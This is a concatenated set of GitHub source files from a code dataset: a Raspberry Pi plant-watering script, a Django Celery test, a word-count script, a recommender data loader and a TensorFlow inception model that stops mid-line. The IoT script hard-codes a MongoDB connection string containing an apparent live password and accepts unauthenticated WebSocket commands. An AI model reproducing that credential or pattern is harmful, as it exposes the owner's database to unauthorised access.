print(result)","repo_name":"geniuscynic/leetcode","sub_path":"python/0001.py","file_name":"0001.py","file_ext":"py","file_size_in_byte":1019,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"71457343505","text":"import time\nimport datetime\nimport smbus\nimport spidev\nimport DHT\nimport pigpio\nimport RPi.GPIO as GPIO\nimport signal\nimport websocket\nimport threading\nimport rel\nimport datetime\nimport pymongo\nfrom pymongo import MongoClient\n\n# url of WebSocket server\nurl = \"ws://192.168.0.13:3000\"\n\n# Pin number to control water pump\nWATER_PIN = 21 # GPIO21 (BCM)\nGPIO.setmode(GPIO.BCM)\nGPIO.setup(WATER_PIN, GPIO.OUT)\n\n# pin configurations\nDHT_PIN = 18 # GPIO18, pin12\n\n# I2C light intensity variables\nI2C_CHANNEL = 1 # I2C channel1 is connected to GPIO pins\nI2C_ADDRESS = 0x23 # I2C address of light intensity sensor\nCONTINUOUS_HIGH_RES_MODE = 0x10 # start measuring at 1 lux res, measurement time ~120ms\nONE_TIME_HIGH_RES_MODE = 0x20\n\n# SPI soil moisture variables\nspi_bus = 0\nspi_chip_select = 0\n\n# Database client\nclient = pymongo.MongoClient(\"mongodb+srv://IoTwebapp:T8hz4Xe4Z4pY5cDI@rpi-sensor-data.vmud14a.mongodb.net/?retryWrites=true&w=majority\")\n# Database \ndb = client.SensorData\n# Collections\ncollectionHumidity = db.HumidityData\ncollectionLightIntensity = db.LightIntensityData\ncollectionTemperature = db.TemperatureData\ncollectionSoil = db.SoilMoistureData\n\nplantStatus = 'OK'\n\n# --- Configurations ---\n# These configuration options can be updated by the server via a WebSocket\n\n# Configurable optimal levels for temperature/humidity/soil moisture/light exposure time\n# will send alerts to server if plant measurements leave these bounds\noptimalLevels = {'tempLower': 60, 'tempUpper': 85, \n\t\t'humidityLower': 30, 'humidityUpper': 95,\n\t\t'soilMoistureSetpoint': 50,\n\t\t'sunlightTime': 4.5,\n\t\t'wateringTime': 40}\n# Watering mode\n# manual = only water when user gives the command\n# time = water every 'wateringTime' hours\n# soil_moisture = attempt to keep the soil moisture hovering around the setpoint on average\nwateringMode = \"manual\"\n\n# have to call GPIO cleanup when program is terminated\n# with CTRL+C to properly clean up GPIO for the next time the program is run\ndef cleanup(signum, frame):\n GPIO.cleanup()\nsignal.signal(signal.SIGINT, cleanup)\n\n# --- DEVICE FUNCTIONS ---\n# Functions for interfacing with devices wired to the RPi\ndef configure_devices():\n\tdhtSensor = DHT.sensor(pigpio.pi(), DHT_PIN, model=DHT.DHTXX) \n\tbus = smbus.SMBus(I2C_CHANNEL)\n\tspi = spidev.SpiDev()\n\tspi.open(spi_bus, spi_chip_select)\n\tspi.mode = 0\n\tspi.max_speed_hz = 500000\n\ttime.sleep(0.5) \n\treturn dhtSensor, bus, spi\n\ndef read_temp_humidity(sensor):\n\ttimestamp, gpio, status, temperature_c, humidity = sensor.read()\n\ttemperature_f = temperature_c * (9/5) + 32\n\treturn temperature_f, humidity\n\t\ndef read_light_intensity(i2c_bus):\n\ti2c_bus.write_byte(I2C_ADDRESS, ONE_TIME_HIGH_RES_MODE) # trigger measurement\n\ttime.sleep(1) # need at least 120ms to take measurement\n\traw = i2c_bus.read_word_data(I2C_ADDRESS,0x00) # read data\n\t# bytes in measurement will be swapped when read in \n\tlight_intensity = ((raw & 0xff00) >> 8) | ((raw & 0x00ff) << 8)\n\treturn light_intensity\n\ndef read_soil_moisture(spi):\n\traw = spi.readbytes(2)\n\traw = (raw[0]<<8)|raw[1]\n\t#print(f\"Soil moisture raw {raw}\")\n\t# in testing, saturated soil read 1100-1400 and dry soil read 2700-3100\n\t# so use 1100 as upper soil moisture & 3100 as lower soil moisture\n\treturn 100 - 100*float(raw-1100)/(3100-1100)\n\ndef run_water_pump(seconds):\n\tGPIO.output(WATER_PIN, GPIO.HIGH)\n\ttime.sleep(seconds)\n\tGPIO.output(WATER_PIN, GPIO.LOW)\n\n# --- NETWORK FUNCTIONS ---\n# Functions to communicate with the WebSocket server & MongoDB server\n\n# WebSocket functions\ndef on_message(ws, message):\n\tmsg_parts = message.split(':') \n\tif msg_parts[0] == \"waterPlant\":\n\t\trun_water_pump(2)\n\t\tprint(\"trigger plant watering!\")\n\telif msg_parts[0] == 'wateringMethodChange':\n\t\tglobal wateringMode\n\t\twateringMode = msg_parts[1]\n\t\tprint(f\"Change watering method to {msg_parts[1]}\")\n\t\t\n\telif msg_parts[0] == 'alertLevelsChange':\n\t\tprint(f\"Change alert levels\")\n\t\tglobal optimalLevels\n\t\toptimalLevels['tempLower'] = int(msg_parts[1].split('_')[0])\n\t\toptimalLevels['tempUpper'] = int(msg_parts[1].split('_')[1])\n\t\toptimalLevels['humidityLower'] = int(msg_parts[2].split('_')[0])\n\t\toptimalLevels['humidityUpper'] = int(msg_parts[2].split('_')[1])\n\t\toptimalLevels['soilMoistureSetpoint'] = int(msg_parts[3])\n\t\toptimalLevels['sunlightTime'] = int(msg_parts[4])\n\t\toptimalLevels['wateringTime'] = int(msg_parts[5])\n\n\t\tprint(optimalLevels)\n\t\t\n\tws.send('Message receipt acknowledged')\n\t\ndef on_error(ws, error):\n\tprint(error)\n\t\ndef on_close(ws, close_status_code, close_msg):\n\tprint(\"Connection closed\")\n\t\ndef on_open(ws):\n\tprint(\"Opened connection\")\n\ndef connect_websocket():\n\t# Start WebSocket connection\n\twebsocket.enableTrace(True)\n\tws = websocket.WebSocketApp(url,\n\t\t\t\t\t\t\ton_open=on_open, \n\t\t\t\t\t\t\ton_message=on_message,\n\t\t\t\t\t\t\ton_error=on_error,\n\t\t\t\t\t\t\ton_close=on_close)\n\t# Open the WebSocket server in a separate thread\n\t# so the Pi can continue to collect sensor data\n\twst = threading.Thread(target=ws.run_forever)\n\twst.daemon = True\n\twst.start()\n\n\treturn ws\n\n\n# Upload data to MongoDB server\ndef upload_data(humidity, temp, lx, soil):\n # Format of Data\n SensorData = {\n 'Data':humidity,\n 'SensorID':'TempHumidity_1',\n 'SensorName': 'Humidity Sensor',\n 'TimeCollected': datetime.datetime.now()\n }\n collectionHumidity.insert_one(SensorData)\n \n # Format of Data\n SensorData = {\n 'Data':humidity,\n 'SensorID':'TempHumidity_1',\n 'SensorName': 'Temperature Sensor',\n 'TimeCollected': datetime.datetime.now()\n }\n collectionTemperature.insert_one(SensorData)\n \n # Format of Data\n SensorData = {\n 'Data':lx,\n 'SensorID':'LightIntensity_1',\n 'SensorName': 'Light Intensity Sensor',\n 'TimeCollected': datetime.datetime.now()\n }\n collectionLightIntensity.insert_one(SensorData)\n \n # Format of Data\n SensorData = {\n 'Data':soil,\n 'SensorID':'SoilMoisture_1',\n 'SensorName': 'Soil Moisture Sensor',\n 'TimeCollected': datetime.datetime.now()\n }\n collectionSoil.insert_one(SensorData)\n\n\nif __name__ == \"__main__\":\n\tdhtSensor, i2c_bus, spi = configure_devices()\n\n\t# Note that with this current setup the server must\n\t# be started before running this script\n\ttry:\n\t\tws = connect_websocket()\n\texcept Exception as e:\n\t\tprint(\"WebSocket failed to connect\")\n\t\tprint(e)\n\t\t\n\twateringPause = False\n\tlastWatered = None\n\twhile True:\n\t\tnow = time.time()\n\t\t# gather data from various sensors\n\t\tt, h = read_temp_humidity(dhtSensor)\n\t\tlx = read_light_intensity(i2c_bus)\n\t\tsoil_moisture = read_soil_moisture(spi)\n\t\t# upload data to MongoDB database\n\t\tupload_data(h,t,lx,soil_moisture)\n\n\t\tnewPlantStatus = []\n\t\tif t > optimalLevels['tempUpper']:\n\t\t\tnewPlantStatus.append('TEMP_HIGH')\n\t\telif t < optimalLevels['tempLower']:\n\t\t\tnewPlantStatus.append('TEMP_LOW')\n \n\t\tif h > optimalLevels['humidityUpper']:\n\t\t\tnewPlantStatus.append('HUMIDTY_HIGH')\n\t\telif h < optimalLevels['humidityLower']:\n\t\t\tnewPlantStatus.append('HUMIDITY_LOW')\n\n\t\tif len(newPlantStatus) == 0:\n\t\t\tnewPlantStatus = \"OK\"\n\t\telse:\n\t\t\tnewPlantStatus = ','.join(newPlantStatus)\n\n\t\t# Update plant status to server if measurements fall outside optimal levels\n\t\tif newPlantStatus != plantStatus:\n\t\t\tws.send(f'plantStatus:{newPlantStatus}')\n\t\tplantStatus = newPlantStatus\n\n # water based on soil moisture\n # if we just watered, wait 2 minutes before concluding it wasn't enough\n # and watering again\n\t\tif wateringMode == \"soil_moisture\" and (lastWatered == None or now-lastWatered > 120):\n\t\t\t# don't water until we're ~10% below where we should be\n\t\t\tif soil_moisture < 0.9*optimalLevels['soilMoistureSetpoint']:\n\t\t\t\trun_water_pump(3)\n\t\t\t\tlastWatered = time.time()\n\t\t# water based on time since last watered\n\t\t# uses seconds for testing, real system would use hours\n\t\telif wateringMode == \"time\" and (lastWatered == None or now-lastWatered > int(optimalLevels['wateringTime'])):\n\t\t\trun_water_pump(3)\n\t\t\tlastWatered = time.time() \n\n \n\t\tprint(f\"Temperature:{t}\\nHumidity:{h}\\nLight Intensity:{lx}\\nSoil Moisture:{soil_moisture}\\n\")\n\t\ttime.sleep(3)\n\tGPIO.cleanup()\n","repo_name":"aHarry01/IoT_Final_Project","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8188,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"33641254224","text":"\nfrom datetime import datetime, timedelta\n\nfrom django.contrib.auth.models import User\nfrom django.core import mail\nfrom django.test import TestCase\nfrom pytz import timezone\n\nfrom tasks.models import Task, TaskReport\nfrom tasks.tasks import get_user_tasks_status, send_email_report\n\n\nclass TestCeleryFunction(TestCase):\n\n def setUp(self):\n self.user = User.objects.create(username='test_user_1')\n self.user.set_password('pass123')\n self.user.save()\n\n def create_tasks(self, length=1, user=None, completed=False, deleted=False, status='PENDING'):\n for i in range(1, length + 1):\n Task.objects.create(\n user=user, \n title=f\"TEST TASK {i} TITLE\", \n description=f\"Test task {i} description\", \n priority=i, \n deleted=deleted, \n completed=completed,\n status=status\n )\n \n def test_send_email_report(self):\n curr_time = datetime.now(tz=timezone('UTC')) - timedelta(minutes=10)\n task_report = TaskReport.objects.create(user=self.user, user_mail='mail@abc.com', report_time='11:00', next_run_at=curr_time)\n result = send_email_report.apply()\n\n self.assertTrue(result.successful())\n self.assertEqual(len(mail.outbox), 1)\n self.assertEqual(mail.outbox[0].recipients()[0], task_report.user_mail)\n self.assertEqual(TaskReport.objects.get(user=self.user).next_run_at, curr_time + timedelta(days=1))\n\n def test_get_user_tasks_status(self):\n self.create_tasks(1, user=self.user)\n self.create_tasks(1, user=self.user, completed=True, status='COMPLETED')\n self.create_tasks(1, user=self.user, status='IN_PROGRESS')\n self.create_tasks(1, user=self.user, status='CANCELLED')\n\n founded_message = get_user_tasks_status(self.user)\n expected_message = f\"Hi {self.user.username},\\n\\nHere is your tasks report for today:\\n\\nTotal tasks added: 4\\nPending tasks: 1\\nIn Progress tasks: 1\\nCompleted tasks: 1\\nCancelled tasks: 1\\n\\nThanks\"\n\n self.assertEqual(founded_message, expected_message)\n","repo_name":"localhost-8000/UnitTesting_django_task_manager","sub_path":"tasks/tests/test_celery_scheduler.py","file_name":"test_celery_scheduler.py","file_ext":"py","file_size_in_byte":2132,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"29171542152","text":"import time\ndef text_to_words(the_text):\n \"\"\" return a list of words with all punctuation removed,\n and all in lowercase.\n \"\"\"\n\n my_substitutions = the_text.maketrans(\n # If you find any of these\n \"ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&()*+,-./:;<=>?@[]^_`{|}~'\\\\\",\n # Replace them by these\n \"abcdefghijklmnopqrstuvwxyz \")\n\n # Translate the text now.\n cleaned_text = the_text.translate(my_substitutions)\n wds = cleaned_text.split()\n return wds\n\n##open alice, make a list out of all the words minus punctuation and capitals.\n##PROBLEM: this splits up words like wouldn't into wouldn and t\nt0 = time.clock()\nf = open(\"alice.txt\")\ncontent = f.read()\nf.close()\nthe_words = text_to_words(content)\n\n##add dictionary keys\ndictionary = {}\nfor i in the_words:\n if i not in dictionary: ##no repeat counting!\n dictionary[i] = the_words.count(i) ##find frequency\n\n#got to turn this back into a list to alphabetize.\nalpha_words = list(dictionary.items())\nalpha_words.sort()\n\n#write to a new file\ng = open(\"alice_words.txt\", \"w\")\ndash = '-' * 31 + \"\\n\"\nfor i in range(len(alpha_words)):\n if i == 0:\n g.write(\"{0:<30s}{1:s} \\n\".format(\"WORD\", \"COUNT\"))\n g.write(dash)\n g.write(\"{0:<30s} {1:d} \\n\".format(alpha_words[i][0],alpha_words[i][1]))\n\ng.close()\nt1 = time.clock()\nprint(\"That took {} seconds to complete!\".format(t1-t0))\n\n\n\n\n\n","repo_name":"kprahman/py_book_exercises","sub_path":"ch20/alice_words.py","file_name":"alice_words.py","file_ext":"py","file_size_in_byte":1442,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"72065063826","text":"import os\nfrom collections import defaultdict\nfrom pathlib import Path\n\nimport itertools\n\n''' TrainDatabase is inspired from various pyhton libraries like scikit-learn when they use dicts to \ndeal with sparse matrioes and such sparse matrices always appear in our course\nMoreover, you can ask, why use their design and not develop yours ?\nAnswer to this is simple, This is not DB Design Course, Hence i have not bothered to developed newer DB paradigms\n'''\n\nfrom four_svd.train_db import TrainDatabase\n\n\nclass Database:\n\n def __init__(self, folds_files=None, sep = \"\\t\"):\n self.sep = sep\n self.fold_files = folds_files\n\n def actual_ratings_file_foldwise(self):\n for train_file, test_file in self.fold_files:\n with open(train_file) as f:\n actual_train_ratings = [self.parse_line(line) for line in\n itertools.islice(f, 0, None)]\n with open(test_file) as f:\n actual_test_ratings = [self.parse_line(line) for line in\n itertools.islice(f, 0, None)]\n yield actual_train_ratings, actual_test_ratings\n\n\n def construct_trainset(self, actual_trainset):\n\n actual2smart_id_users = {}\n actual2smart_id_items = {}\n\n current_u_index = 0\n current_i_index = 0\n\n u_dict = defaultdict(list)\n r_dict = defaultdict(list)\n\n for urid, irid, r in actual_trainset:\n try:\n uid = actual2smart_id_users[urid]\n except KeyError:\n uid = current_u_index\n actual2smart_id_users[urid] = current_u_index\n current_u_index += 1\n try:\n iid = actual2smart_id_items[irid]\n except KeyError:\n iid = current_i_index\n actual2smart_id_items[irid] = current_i_index\n current_i_index += 1\n\n u_dict[uid].append((iid, r))\n r_dict[iid].append((uid, r))\n\n total_users = len(u_dict) # number of users\n total_items = len(r_dict) # number of items\n total = len(actual_trainset)\n\n trainset = TrainDatabase(u_dict,\n r_dict,\n total_users,\n total_items,\n # total,\n\n actual2smart_id_users,\n actual2smart_id_items)\n\n return trainset\n\n def folds(self):\n for actual_trainData, actual_testData in self.actual_ratings_file_foldwise():\n trainset = self.construct_trainset(actual_trainData)\n yield trainset, actual_testData\n\n\n def parse_line(self, line):\n line = line.split(self.sep)\n uid, iid, r = (line[i].strip()\n for i in [0, 1, 2])\n return uid, iid, float(r)\n\n\n","repo_name":"himanshusagar/cf_mid_sem","sub_path":"four_svd/database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":2873,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"21726157387","text":"import functools\nimport tensorflow as tf\n\nfrom data import image_size, num_channels, num_labels\nfrom model import Model\nfrom neural_network import get_filter_output_size, depth_concat, get_l2_loss\n\n\nprint_messages = False\n\nclass Module():\n\n def __init__(self, one_by_one_conv_weights_to_three_by_three, one_by_one_conv_biases_to_three_by_three, one_by_one_conv_weights_to_five_by_five, one_by_one_conv_biases_to_five_by_five,\n one_by_one_conv_weights_to_depthconcat, one_by_one_conv_biases_to_depthconcat, one_by_one_conv_weights_from_max_pool, one_by_one_conv_biases_from_max_pool, three_by_three_conv_weights,\n three_by_three_conv_biases, five_by_five_conv_weights, five_by_five_conv_biases):\n self.one_by_one_conv_weights_to_three_by_three = one_by_one_conv_weights_to_three_by_three\n self.one_by_one_conv_biases_to_three_by_three = one_by_one_conv_biases_to_three_by_three\n self.one_by_one_conv_weights_to_five_by_five = one_by_one_conv_weights_to_five_by_five\n self.one_by_one_conv_biases_to_five_by_five = one_by_one_conv_biases_to_five_by_five\n self.one_by_one_conv_weights_to_depthconcat = one_by_one_conv_weights_to_depthconcat\n self.one_by_one_conv_biases_to_depthconcat = one_by_one_conv_biases_to_depthconcat\n self.one_by_one_conv_weights_from_max_pool = one_by_one_conv_weights_from_max_pool\n self.one_by_one_conv_biases_from_max_pool = one_by_one_conv_biases_from_max_pool\n self.three_by_three_conv_weights = three_by_three_conv_weights\n self.three_by_three_conv_biases = three_by_three_conv_biases\n self.five_by_five_conv_weights = five_by_five_conv_weights\n self.five_by_five_conv_biases = five_by_five_conv_biases\n\n def get_weights(self):\n return [self.one_by_one_conv_weights_to_three_by_three, self.one_by_one_conv_weights_to_five_by_five, self.one_by_one_conv_weights_to_depthconcat,\n self.one_by_one_conv_weights_from_max_pool, self.three_by_three_conv_weights, self.five_by_five_conv_weights]\n\ndef create_inception_module(in_channels, feature_maps, input_spatial_size, initialised_weights_stddev):\n \"\"\"\n Inception module:\n input layer\n 1x1+1 conv, 1x1+1 conv, 3x3+1 maxpool\n 1x1+1 conv, 3x3+1 conv, 5x5+1 conv, 1x1+1 conv\n DepthConcat\n \"\"\"\n _1x1_fm, _1x1_3x3_fm, _3x3_fm, _1x1_5x5_fm, _5x5_fm, mp_1x1_fm = feature_maps\n patch_size = 1\n one_by_one_conv_weights_to_three_by_three = tf.Variable(tf.truncated_normal(\n [patch_size, patch_size, in_channels, _1x1_3x3_fm], stddev=initialised_weights_stddev), name='1x1w_to_3x3')\n one_by_one_conv_biases_to_three_by_three = tf.Variable(tf.constant(initialised_weights_stddev * 10, shape=[_1x1_3x3_fm]), name='1x1b_to_3x3')\n \n one_by_one_conv_weights_to_five_by_five = tf.Variable(tf.truncated_normal(\n [patch_size, patch_size, in_channels, _1x1_5x5_fm], stddev=initialised_weights_stddev), name='1x1w_to_5x5')\n one_by_one_conv_biases_to_five_by_five = tf.Variable(tf.constant(initialised_weights_stddev * 10, shape=[_1x1_5x5_fm]), name='1x1b_to_5x5')\n \n one_by_one_conv_weights_to_depthconcat = tf.Variable(tf.truncated_normal(\n [patch_size, patch_size, in_channels, _1x1_fm], stddev=initialised_weights_stddev), name='1x1w_to_depth_concat')\n one_by_one_conv_biases_to_depthconcat = tf.Variable(tf.constant(initialised_weights_stddev * 10, shape=[_1x1_fm]), name='1x1b_to_depth_concat')\n \n #number_of_max_pools = 1\n #three_by_three_max_pool_output_size = get_filter_output_size(image_size, number_of_max_pools)\n max_pool_size = 3\n max_pool_stride = 1\n three_by_three_max_pool_output_size = get_filter_output_size(input_spatial_size, max_pool_size, max_pool_stride)\n if print_messages: print(\"three_by_three_max_pool_output_size: %s\" % three_by_three_max_pool_output_size)\n one_by_one_conv_weights_from_max_pool = tf.Variable(tf.truncated_normal(\n [three_by_three_max_pool_output_size, three_by_three_max_pool_output_size, in_channels, mp_1x1_fm], stddev=initialised_weights_stddev),\n name='1x1w_from_maxpool')\n one_by_one_conv_biases_from_max_pool = tf.Variable(tf.constant(initialised_weights_stddev * 10, shape=[mp_1x1_fm]), name='1x1b_from_maxpool')\n \n patch_size = 3\n three_by_three_conv_weights = tf.Variable(tf.truncated_normal(\n [patch_size, patch_size, _1x1_3x3_fm, _3x3_fm], stddev=initialised_weights_stddev), name='3x3w')\n three_by_three_conv_biases = tf.Variable(tf.constant(initialised_weights_stddev * 10, shape=[_3x3_fm]), name='3x3b')\n \n patch_size = 5\n five_by_five_conv_weights = tf.Variable(tf.truncated_normal(\n [patch_size, patch_size, _1x1_5x5_fm, _5x5_fm], stddev=initialised_weights_stddev), name='5x5w')\n five_by_five_conv_biases = tf.Variable(tf.constant(initialised_weights_stddev * 10, shape=[_5x5_fm]), name='5x5b')\n\n # The 3x3 maxpooling layer, and DepthConcat layer don't need any variables.\n return Module(one_by_one_conv_weights_to_three_by_three, one_by_one_conv_biases_to_three_by_three, one_by_one_conv_weights_to_five_by_five, one_by_one_conv_biases_to_five_by_five,\n one_by_one_conv_weights_to_depthconcat, one_by_one_conv_biases_to_depthconcat, one_by_one_conv_weights_from_max_pool, one_by_one_conv_biases_from_max_pool, three_by_three_conv_weights,\n three_by_three_conv_biases, five_by_five_conv_weights, five_by_five_conv_biases)\n\ndef create_inception_module_graph(module, input_tensor):\n # Adjacent layer 1\n if print_messages: print(\"input_tensor shape:\", input_tensor.get_shape().as_list())\n if print_messages: print(\"one_by_one_conv_weights_to_three_by_three shape:\", module.one_by_one_conv_weights_to_three_by_three.get_shape().as_list())\n conv = tf.nn.conv2d(input_tensor, module.one_by_one_conv_weights_to_three_by_three, [1, 1, 1, 1], padding='SAME')\n one_by_one_conv_weights_to_three_by_three_output = tf.nn.relu(conv + module.one_by_one_conv_biases_to_three_by_three)\n if print_messages: print(\"one_by_one_conv_weights_to_three_by_three_output shape:\", one_by_one_conv_weights_to_three_by_three_output.get_shape().as_list())\n\n conv = tf.nn.conv2d(input_tensor, module.one_by_one_conv_weights_to_five_by_five, [1, 1, 1, 1], padding='SAME')\n one_by_one_conv_weights_to_five_by_five_output = tf.nn.relu(conv + module.one_by_one_conv_biases_to_five_by_five)\n shape = one_by_one_conv_weights_to_five_by_five_output.get_shape().as_list()\n if print_messages: print(\"one_by_one_conv_weights_to_five_by_five_output shape: %s\" % shape)\n\n max_pool_output = tf.nn.max_pool(input_tensor, [1, 3, 3, 1], [1, 1, 1, 1], padding='SAME')\n shape = max_pool_output.get_shape().as_list()\n if print_messages: print(\"max_pool_output shape: %s\" % shape)\n\n # Adjacent layer 2\n conv = tf.nn.conv2d(input_tensor, module.one_by_one_conv_weights_to_depthconcat, [1, 1, 1, 1], padding='SAME')\n one_by_one_output_to_depthconcat = tf.nn.relu(conv + module.one_by_one_conv_biases_to_depthconcat)\n shape = one_by_one_output_to_depthconcat.get_shape().as_list()\n if print_messages: print(\"one_by_one_output_to_depthconcat shape: %s\" % shape)\n\n conv = tf.nn.conv2d(one_by_one_conv_weights_to_three_by_three_output, module.three_by_three_conv_weights, [1, 1, 1, 1], padding='SAME')\n three_by_three_output = tf.nn.relu(conv + module.three_by_three_conv_biases)\n shape = three_by_three_output.get_shape().as_list()\n if print_messages: print(\"three_by_three_output shape: %s\" % shape)\n\n conv = tf.nn.conv2d(one_by_one_conv_weights_to_five_by_five_output, module.five_by_five_conv_weights, [1, 1, 1, 1], padding='SAME')\n five_by_five_output = tf.nn.relu(conv + module.five_by_five_conv_biases)\n shape = five_by_five_output.get_shape().as_list()\n if print_messages: print(\"five_by_five_output shape: %s\" % shape)\n\n if print_messages: print(\"one_by_one_conv_weights_from_max_pool:\", module.one_by_one_conv_weights_from_max_pool.get_shape().as_list())\n conv = tf.nn.conv2d(max_pool_output, module.one_by_one_conv_weights_from_max_pool, [1, 1, 1, 1], padding='SAME')\n one_by_one_conv_weights_from_max_pool_output = tf.nn.relu(conv + module.one_by_one_conv_biases_from_max_pool)\n shape = one_by_one_conv_weights_from_max_pool_output.get_shape().as_list()\n if print_messages: print(\"one_by_one_conv_weights_from_max_pool_output shape: %s\" % shape)\n \n depth_concat_output = depth_concat([one_by_one_output_to_depthconcat, three_by_three_output, five_by_five_output, one_by_one_conv_weights_from_max_pool_output])\n shape = depth_concat_output.get_shape().as_list()\n if print_messages: print(\"depth_concat_output shape: %s\" % shape)\n return depth_concat_output\n\ndef get_depth_concat_depth(module_feature_maps):\n num_of_feature_maps = 6\n _1x1_fm, _1x1_3x3_fm, _3x3_fm, _1x1_5x5_fm, _5x5_fm, mp_1x1_fm = range(num_of_feature_maps)\n return module_feature_maps[_1x1_fm] + module_feature_maps[_3x3_fm] + module_feature_maps[_5x5_fm] + module_feature_maps[mp_1x1_fm]\n\ndef create_inception_module_model(learning_rate = 0.05, initialised_weights_stddev = 0.1, pre_layer_feature_maps = 64, module_feature_maps=[(128, 128, 128, 128, 128, 128)], batch_size = 32, eval_batch_size = 1000, l2_lambda = 0.1, decay_steps = 10000, decay_rate = 0.96, add_pre_layer_maxpool = False):\n graph = tf.Graph()\n with graph.as_default():\n\n # Input data.\n tf_train_dataset = tf.placeholder(tf.float32, shape=(batch_size, image_size, image_size, num_channels))\n tf_train_labels = tf.placeholder(tf.float32, shape=(batch_size, num_labels))\n eval_dataset = tf.placeholder(tf.float32, shape=(eval_batch_size, image_size, image_size, num_channels))\n dropout_keep_probability = tf.placeholder(tf.float32)\n \"\"\"\n In the inception module, we have the following layers:\n Pre layers:\n 7x7 conv + 2(S)\n\tmaxpool 3x3 + 2(s)\n\tlocal response normalisation\n\n #1x1 conv + 1(V)\n\t#maxpool 3x3 + 1(s)\n\t#local response normalisation\n \n Inception modules: 1\n \n Post layers:\n AveragePool\n \n Fully Connected Output layer\n \"\"\"\n \n # Pre layers\n post_layer_output_feature_maps = pre_layer_feature_maps\n patch_size = 7\n stride = 2\n seven_by_seven_conv_pre_layer_weights = tf.Variable(tf.truncated_normal(\n [patch_size, patch_size, num_channels, post_layer_output_feature_maps], stddev=initialised_weights_stddev), name='7x7_pre_w')\n seven_by_seven_conv_pre_layer_biases = tf.Variable(tf.constant(initialised_weights_stddev * 10, shape=[post_layer_output_feature_maps]), name='7x7_pre_b')\n if print_messages: print(\"image_size:\", image_size)\n seven_by_seven_conv_pre_layer_output_size = get_filter_output_size(image_size, patch_size, stride)\n if print_messages: print(\"seven_by_seven_conv_pre_layer_output_size:\", seven_by_seven_conv_pre_layer_output_size)\n\n three_by_three_maxpool_pre_layer_output_size = get_filter_output_size(seven_by_seven_conv_pre_layer_output_size, patch_size, stride)\n #pre_layer_output_spatial_size\n if print_messages: print(\"three_by_three_maxpool_pre_layer_output_size:\", three_by_three_maxpool_pre_layer_output_size)\n \n # Module layers\n modules = []\n in_channels = post_layer_output_feature_maps \n in_spatial_size = three_by_three_maxpool_pre_layer_output_size if add_pre_layer_maxpool else seven_by_seven_conv_pre_layer_output_size\n number_of_reducing_layers = 2\n stride = 1\n number_of_adjacent_layers_in_inception_module = 4\n for feature_maps in module_feature_maps:\n if print_messages: print(\"in_spatial_size:\", in_spatial_size)\n module = create_inception_module(in_channels, feature_maps, in_spatial_size, initialised_weights_stddev)\n modules.append(module)\n in_channels = get_depth_concat_depth(feature_maps)\n in_spatial_size = get_filter_output_size(in_spatial_size, number_of_reducing_layers, stride)\n\n # Now a fully connected layer\n depth_concat_depth = in_channels #module_feature_maps[-1] * number_of_adjacent_layers_in_inception_module\n # I expect avg_pool_ouput to have a shape of (batch_size, 1, 1, depth_concat_depth)\n # WARNING: I may have gotten the fc_weights tensor size wrong.\n fc_layer_one_neurons = 1000\n fc_layer_one_weights = tf.Variable(tf.truncated_normal(\n [depth_concat_depth, fc_layer_one_neurons], stddev=initialised_weights_stddev * 10))\n fc_layer_one_biases = tf.Variable(tf.constant(initialised_weights_stddev * 10, shape=[fc_layer_one_neurons]))\n \n output_weights = tf.Variable(tf.truncated_normal(\n [fc_layer_one_neurons, num_labels], stddev=initialised_weights_stddev))\n output_biases = tf.Variable(tf.constant(1.0, shape=[num_labels]))\n \n # Model.\n def create_model_graph(data, add_dropout = False):\n shape = data.get_shape().as_list()\n if print_messages: print(\"data shape: %s\" % shape)\n \n # Pre layers\n # 7x7_pre\n stride = 2\n conv = tf.nn.conv2d(data, seven_by_seven_conv_pre_layer_weights, [1, stride, stride, 1], padding='SAME')\n seven_by_seven_conv_pre_layer_output = tf.nn.relu(conv + seven_by_seven_conv_pre_layer_biases)\n if print_messages: print(\"one_by_one_conv_weights_to_three_by_three_output shape: %s\" % seven_by_seven_conv_pre_layer_output.get_shape().as_list())\n \n lrn_input = None\n if add_pre_layer_maxpool:\n # 3x3_mp\n patch_size = 3\n stride = 2\n max_pool_output = tf.nn.max_pool(seven_by_seven_conv_pre_layer_output, [1, patch_size, patch_size, 1], [1, stride, stride, 1], padding='SAME')\n lrn_input = max_pool_output\n else:\n lrn_input = seven_by_seven_conv_pre_layer_output\n \n # https://www.tensorflow.org/versions/r0.10/api_docs/python/nn.html#local_response_normalization\n # TODO: tune the following hyperparameters: depth_radius, bias, alpha, beta\n lrn_output = tf.nn.local_response_normalization(lrn_input)\n \n pre_layers_output = lrn_output\n \n # Inception module(s)\n input_tensor = pre_layers_output\n modules_output = None\n for module in modules:\n # The last module will set modules_output for use below.\n modules_output = create_inception_module_graph(module, input_tensor) \n if print_messages: print(\"module output shape:\", modules_output.get_shape().as_list())\n input_tensor = modules_output\n\n # The patch size of the avg_pool must match the patch_size of the depth_concat_output\n # I assume that the padding must be VALID based on Google's white paper: http://arxiv.org/pdf/1409.4842v1.pdf\n depth_concat_output_image_size_index = 1\n largest_patch_size = modules_output.get_shape().as_list()[depth_concat_output_image_size_index]\n if print_messages: print(\"largest_patch_size:\", largest_patch_size)\n avg_pool_output = tf.nn.avg_pool(modules_output, [1, largest_patch_size, largest_patch_size, 1], [1, 1, 1, 1], padding='VALID', name=None)\n shape = avg_pool_output.get_shape().as_list()\n if print_messages: print(\"avg_pool_output shape:\", shape)\n\n # Flatten the average_pool_output from 4 dimensions down to 2.\n batch_index = 0\n reshape_tensor = tf.reshape(avg_pool_output, (data.get_shape().as_list()[batch_index], 1 * 1 * depth_concat_depth))\n if print_messages: print(\"reshape_tensor shape: %s\" % reshape_tensor.get_shape().as_list())\n \n # Post layers\n # fully connected\n \n output = tf.nn.relu(tf.matmul(reshape_tensor, fc_layer_one_weights) + fc_layer_one_biases)\n if print_messages: print(\"fc_layer_one_output shape: %s\" % output.get_shape().as_list())\n if add_dropout:\n output = 